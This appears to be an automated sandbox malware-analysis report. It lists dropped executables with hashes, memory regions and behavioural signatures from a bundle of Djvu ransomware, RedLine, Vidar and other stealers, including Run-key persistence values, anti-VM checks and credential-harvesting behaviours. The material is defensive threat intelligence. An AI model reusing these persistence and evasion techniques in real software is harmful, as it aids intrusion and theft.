memory/676-113-0x0000000000000000-mapping.dmp

memory/324-112-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat191649b47c9e2.exe

MD5 b904fb528fafefae5c59553a8c31291d
SHA1 0dc01712e88d5bb47cc8fb02678eb46466cc2442
SHA256 717b0790a5cc5b577fb2535effc00fb58a3d62e55537a3d3ae0bf6639e8c9474
SHA512 5a795d4bde04e489e688899937708bd6910d2a36d2b50397fca91590bb6e74921102cf1e4a52405488c6c4aeba92565794470007d6bb1e2f029d17d2095fa1ac

C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat19ba05e89ea6d406.exe

MD5 b160ce13f27f1e016b7bfc7a015f686b
SHA1 bfb714891d12ffd43875e72908d8b9f4f576ad6e
SHA256 fac205247d3b19b5f82f5f4d1269a5c047b6c9ad9f21cc51b4b782c2b08a3b87
SHA512 9578fc34807be2541aa7dc26acbe27211e96b42c6c4208afe195b19b08264dfeb3ea7fec637c759f062cbd5561c5140ecd68cd5c79efbb844d3b2639e336ca0c

memory/324-108-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2184-173-0x0000000000260000-0x0000000000261000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat19e4750dd01.exe

MD5 3a9115aa34ddc3302fe3d07ceddd4373
SHA1 10e7f2a8c421c825a2467d488b33de09c2c2a14b
SHA256 080060800d33d4fa01099647797195995af436cbad0a5dc903a572b184b50634
SHA512 85fa6eddbaec2df843d623ddf88154cd2b62b9823c953b5659dc0464e1a47b90a877ca3681007561d2e1ccdd315e4f79ecf0285404868cc7cedd369ae28a586a

memory/324-105-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/556-104-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat199ba8a4637dcb034.exe

MD5 5af7bc821a1501b38c4b153fa0f5dade
SHA1 467635cce64ae4e3ce41d1819d2ec6abdf5414f3
SHA256 773f2e6660cc3a2b3bb55c0b88a74d24db0dfc5c0cef7c5b13ec9aac48f5d6b6
SHA512 53fd58565d6ca16fc9ca7113cd90657ef8c09fa2efcc9603f6da5c2a3050aaeb1d8edfc46b2b40d80b44a8ccce27d9e4fc6bac62bac236fdc360ebdab3b5c146

memory/324-100-0x0000000064940000-0x0000000064959000-memory.dmp

memory/1056-97-0x0000000000000000-mapping.dmp

memory/324-95-0x0000000064940000-0x0000000064959000-memory.dmp

memory/916-94-0x0000000000000000-mapping.dmp

memory/2036-174-0x0000000000290000-0x00000000002D8000-memory.dmp

memory/324-93-0x0000000064940000-0x0000000064959000-memory.dmp

memory/948-89-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat196ac06a9e6.exe

MD5 f1e2bb0a62bf371a71b62224b18a69b8
SHA1 872738f6cac0e95a4a0625f9d6b6788cf0dbdfa2
SHA256 aec3efab3db88776950250c0bdc2a3be0e8fdb9c07fbcef83549bfa3bedc34ab
SHA512 ce257f0686c9552759f3d06d8218ac4c5c16350fb673843f06d188aeb8bb531fcf7f29a61c60ef52944e6f72ccfe91adff993c791959585c2fe7f1a1c1fe88f6

memory/2036-175-0x0000000000400000-0x0000000002B6B000-memory.dmp

memory/1100-176-0x00000000012F0000-0x00000000012F1000-memory.dmp

memory/1704-177-0x0000000000960000-0x0000000000961000-memory.dmp

memory/392-180-0x00000000032B0000-0x0000000003381000-memory.dmp

memory/308-181-0x0000000002000000-0x0000000002C4A000-memory.dmp

memory/1704-182-0x00000000003C0000-0x00000000003C1000-memory.dmp

memory/392-185-0x0000000000400000-0x00000000017F2000-memory.dmp

memory/1868-184-0x0000000000400000-0x0000000001788000-memory.dmp

memory/1704-186-0x0000000000450000-0x000000000046B000-memory.dmp

memory/1868-183-0x0000000000240000-0x0000000000249000-memory.dmp

memory/1704-187-0x0000000000470000-0x0000000000471000-memory.dmp

memory/1704-189-0x000000001B120000-0x000000001B122000-memory.dmp

memory/1100-188-0x0000000000480000-0x0000000000482000-memory.dmp

memory/2648-190-0x0000000000000000-mapping.dmp

memory/2676-192-0x0000000000000000-mapping.dmp

memory/2648-191-0x0000000000D60000-0x0000000000D61000-memory.dmp

memory/2720-196-0x0000000000000000-mapping.dmp

memory/2648-195-0x0000000000140000-0x000000000015E000-memory.dmp

memory/2740-197-0x0000000000000000-mapping.dmp

memory/2812-200-0x0000000000000000-mapping.dmp

memory/2824-201-0x0000000000000000-mapping.dmp

memory/2720-205-0x0000000001130000-0x0000000001131000-memory.dmp

memory/2676-203-0x0000000000290000-0x0000000000291000-memory.dmp

memory/3004-207-0x0000000000000000-mapping.dmp

memory/2720-209-0x00000000001E0000-0x00000000001E4000-memory.dmp

memory/2648-210-0x000000001AEB0000-0x000000001AEB2000-memory.dmp

memory/2824-211-0x00000000008E0000-0x00000000008E2000-memory.dmp

memory/812-212-0x0000000000000000-mapping.dmp

memory/1628-215-0x0000000000000000-mapping.dmp

memory/812-213-0x000000013F900000-0x000000013F901000-memory.dmp

memory/552-217-0x0000000000000000-mapping.dmp

memory/1768-216-0x0000000000000000-mapping.dmp

memory/552-219-0x0000000001230000-0x0000000001231000-memory.dmp

memory/1628-220-0x00000000013B0000-0x00000000013B1000-memory.dmp

memory/1768-223-0x0000000000260000-0x0000000000261000-memory.dmp

memory/1628-224-0x00000000001C0000-0x00000000001C1000-memory.dmp

memory/1628-225-0x00000000001D0000-0x00000000001EB000-memory.dmp

memory/1628-226-0x00000000001F0000-0x00000000001F1000-memory.dmp

memory/2140-227-0x0000000000000000-mapping.dmp

memory/1212-231-0x0000000003E10000-0x0000000003E25000-memory.dmp

memory/1628-230-0x00000000009A0000-0x00000000009A2000-memory.dmp

memory/552-229-0x000000001B000000-0x000000001B002000-memory.dmp

memory/2140-232-0x0000000000840000-0x0000000000841000-memory.dmp

memory/1712-234-0x0000000000000000-mapping.dmp

memory/2480-237-0x0000000000000000-mapping.dmp

memory/928-238-0x0000000000000000-mapping.dmp

memory/1956-241-0x0000000000000000-mapping.dmp

memory/2616-243-0x0000000000000000-mapping.dmp

memory/2616-249-0x0000000000260000-0x0000000000261000-memory.dmp

memory/2696-246-0x0000000000000000-mapping.dmp

memory/1768-245-0x00000000048F0000-0x00000000048F1000-memory.dmp

memory/928-248-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2704-250-0x0000000000000000-mapping.dmp

memory/1100-252-0x0000000000000000-mapping.dmp

memory/1648-257-0x0000000000000000-mapping.dmp

memory/2892-255-0x0000000000000000-mapping.dmp

memory/1100-259-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2712-260-0x0000000000000000-mapping.dmp

memory/1796-263-0x0000000000000000-mapping.dmp

memory/2768-266-0x0000000000000000-mapping.dmp

memory/1712-268-0x0000000002B80000-0x0000000002BAF000-memory.dmp

memory/2712-269-0x0000000000260000-0x0000000000261000-memory.dmp

memory/2140-272-0x0000000004C00000-0x0000000004C01000-memory.dmp

memory/1796-271-0x000000001AF10000-0x000000001AF12000-memory.dmp

memory/1712-273-0x0000000000400000-0x0000000002B5D000-memory.dmp

memory/2480-274-0x0000000000400000-0x0000000002B6D000-memory.dmp

memory/2480-275-0x0000000000290000-0x00000000002C0000-memory.dmp

memory/2796-277-0x0000000000000000-mapping.dmp

memory/2192-278-0x0000000000000000-mapping.dmp

memory/1380-276-0x0000000000000000-mapping.dmp

memory/2676-282-0x0000000000000000-mapping.dmp

memory/2480-284-0x0000000007041000-0x0000000007042000-memory.dmp

memory/2480-288-0x0000000007042000-0x0000000007043000-memory.dmp

memory/1088-290-0x0000000000000000-mapping.dmp

memory/2480-289-0x0000000007043000-0x0000000007044000-memory.dmp

memory/1088-301-0x0000000004960000-0x0000000004961000-memory.dmp

memory/2480-300-0x0000000007044000-0x0000000007046000-memory.dmp

memory/1444-303-0x0000000000000000-mapping.dmp

memory/2816-305-0x0000000000000000-mapping.dmp

memory/2360-310-0x0000000000000000-mapping.dmp

memory/2076-309-0x0000000000000000-mapping.dmp

memory/2868-313-0x0000000000000000-mapping.dmp

memory/2796-314-0x0000000004AF0000-0x0000000004AF1000-memory.dmp

memory/1608-315-0x0000000000000000-mapping.dmp

memory/1152-319-0x0000000000000000-mapping.dmp

memory/1632-317-0x0000000000000000-mapping.dmp

memory/2604-322-0x0000000000000000-mapping.dmp

memory/2556-327-0x000000000041C5E2-mapping.dmp

memory/296-329-0x000000000041C5EE-mapping.dmp

memory/2360-333-0x0000000002240000-0x00000000039F5000-memory.dmp

memory/2360-334-0x0000000000400000-0x0000000001BB5000-memory.dmp

memory/2556-340-0x0000000000760000-0x0000000000761000-memory.dmp

memory/2096-342-0x0000000000400000-0x0000000000416000-memory.dmp

memory/296-343-0x0000000004A20000-0x0000000004A21000-memory.dmp

memory/2232-348-0x0000000000270000-0x0000000000271000-memory.dmp

memory/3028-350-0x0000000000180000-0x0000000000182000-memory.dmp

memory/2716-351-0x0000000000A60000-0x0000000000A62000-memory.dmp

memory/768-352-0x0000000000C20000-0x0000000000C22000-memory.dmp

memory/812-360-0x000000001ACD0000-0x000000001ACD2000-memory.dmp

memory/2824-365-0x00000000006C0000-0x00000000006C1000-memory.dmp

memory/2704-368-0x00000000050E0000-0x00000000050E1000-memory.dmp

memory/3408-371-0x0000000000110000-0x0000000000153000-memory.dmp

memory/3196-376-0x000000001C790000-0x000000001C792000-memory.dmp

memory/3700-379-0x0000000002390000-0x0000000002392000-memory.dmp

memory/3840-382-0x0000000001EA0000-0x0000000001EA1000-memory.dmp

memory/3800-383-0x0000000000310000-0x0000000000311000-memory.dmp

memory/3144-386-0x0000000001D40000-0x0000000001E11000-memory.dmp

memory/3144-387-0x0000000000400000-0x00000000017F2000-memory.dmp

memory/3052-391-0x0000000000350000-0x00000000003D0000-memory.dmp

memory/3272-392-0x0000000003BD0000-0x0000000003FD2000-memory.dmp

memory/3272-393-0x0000000000400000-0x0000000001B80000-memory.dmp

memory/3304-396-0x0000000140000000-0x0000000140763000-memory.dmp

memory/3304-397-0x0000000000470000-0x0000000000490000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2021-09-11 20:41

Reported

2021-09-11 21:12

Platform

win10-jp

Max time kernel

1811s

Max time network

1810s

Command Line

c:\windows\system32\svchost.exe -k netsvcs -s gpsvc

Signatures

Djvu Ransomware

ransomware djvu

Glupteba

loader dropper glupteba

Glupteba Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

MetaSploit

trojan backdoor metasploit

Modifies system executable filetype association

persistence
Description Indicator Process Target
Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx\ = "{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe

RedLine

infostealer redline

RedLine Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Registers COM server for autorun

persistence

SmokeLoader

trojan backdoor smokeloader

Socelars

stealer socelars

Socelars Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of NtCreateProcessExOtherParentProcess

Description Indicator Process Target
PID 4452 created 4316 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 4592 created 3404 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat19e4750dd01.exe

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 5960 created 5172 N/A \??\c:\windows\system32\svchost.exe C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
PID 5960 created 2740 N/A \??\c:\windows\system32\svchost.exe C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe

Vidar

stealer vidar

Checks for common network interception software

evasion

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\is-QR3HM.tmp\46807GHF____.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat19e4750dd01.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat191649b47c9e2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat1946eb84e6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat19f84b58b3d7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat196ac06a9e6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat19e6a852f849bb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat199ba8a4637dcb034.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat19ba05e89ea6d406.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat19c6762a08beae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-620S8.tmp\Sat19ba05e89ea6d406.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-QR3HM.tmp\46807GHF____.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe N/A
N/A N/A C:\Windows\system32\browser_broker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe N/A
N/A N/A C:\ProgramData\4638748.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udptest.exe N/A
N/A N/A C:\ProgramData\330255.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3002.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-EB0NR.tmp\setup_2.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jhuuee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe N/A
N/A N/A C:\ProgramData\330255.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-C4PRC.tmp\ultramediaburner.tmp N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\ProgramData\1767048.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
N/A N/A C:\ProgramData\408949.exe N/A
N/A N/A C:\ProgramData\690570.exe N/A
N/A N/A C:\ProgramData\7454952.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\ProgramData\1350539.exe N/A
N/A N/A C:\ProgramData\7454952.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE N/A
N/A N/A C:\Program Files\Windows Media Player\VLAYMQWNQW\ultramediaburner.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-C4PRC.tmp\ultramediaburner.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\97-4ed47-8c5-fcaa3-c4a113f7fd1ad\Nyxaemekovy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b5-d300e-bc3-cf6a9-a11571ea2a86b\SHulogelishi.exe N/A
N/A N/A C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4doxgwmn.iek\GcleanerEU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4sr2mtx2.ujk\installer.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0vsjjct3.czj\gcleaner.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EF0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\246D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4208.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4208.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6919.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4208.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4208.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\b05c81bb-36fe-4dcd-92d7-87f04a0bb65c\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\b05c81bb-36fe-4dcd-92d7-87f04a0bb65c\build3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\b05c81bb-36fe-4dcd-92d7-87f04a0bb65c\build2.exe N/A

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\RenameTest.raw => C:\Users\Admin\Pictures\RenameTest.raw.wiot C:\Users\Admin\AppData\Local\Temp\4208.exe N/A
File renamed C:\Users\Admin\Pictures\JoinWait.crw => C:\Users\Admin\Pictures\JoinWait.crw.wiot C:\Users\Admin\AppData\Local\Temp\4208.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\C8CE.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\C8CE.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\97-4ed47-8c5-fcaa3-c4a113f7fd1ad\Nyxaemekovy.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-620S8.tmp\Sat19ba05e89ea6d406.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-EB0NR.tmp\setup_2.tmp N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-C4PRC.tmp\ultramediaburner.tmp N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat19e6a852f849bb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat19e6a852f849bb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4sr2mtx2.ujk\installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4sr2mtx2.ujk\installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4sr2mtx2.ujk\installer.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4sr2mtx2.ujk\installer.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6919.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6919.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6919.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6919.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6919.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\b05c81bb-36fe-4dcd-92d7-87f04a0bb65c\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\b05c81bb-36fe-4dcd-92d7-87f04a0bb65c\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B0D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B0D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B0D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B0D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B0D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses 2FA software files, possible credential harvesting

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" C:\ProgramData\4638748.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\Tedisaeraja.exe\"" C:\Users\Admin\AppData\Local\Temp\is-QR3HM.tmp\46807GHF____.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\a4d8c519-f54f-4af3-a594-deab4073acdc\\4208.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\4208.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Update Binary = "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\"" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
